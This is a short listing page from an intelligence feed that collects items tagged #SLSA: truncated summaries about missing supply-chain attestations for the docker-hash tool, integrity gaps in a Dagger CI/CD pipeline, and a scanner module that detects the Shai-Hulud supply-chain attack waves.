This page collects WhisperX intelligence signals tagged #SLSA. It is designed for humans, search engines, and AI agents: each item links to a canonical source-backed record with sector, source, timestamp, credibility, and exportable structured data.
The `docker-hash` tool, a critical dependency for countless CI/CD pipelines, currently ships its release artifacts with zero verifiable supply-chain security. As a CLI, Docker image, and GitHub Action, its compromised build process would directly infect every downstream consumer. There is no SLSA attestation, no SBOM, ...
A critical review of the existing Dagger CI/CD pipeline reveals multiple, unaddressed supply chain integrity risks that leave the software delivery process vulnerable to undetected compromise. The current workflow, while performing vulnerability scans, lacks fundamental cryptographic and attestation safeguards. This cr...
A new security module targeting the Mini Shai-Hulud supply chain attack family has been merged into Sentinel, the open-source security scanner. The module, labeled `shai-hulud`, detects all four documented attack waves spanning September 2025 through May 2026, including the recently disclosed compromise of 42 `@tanstac...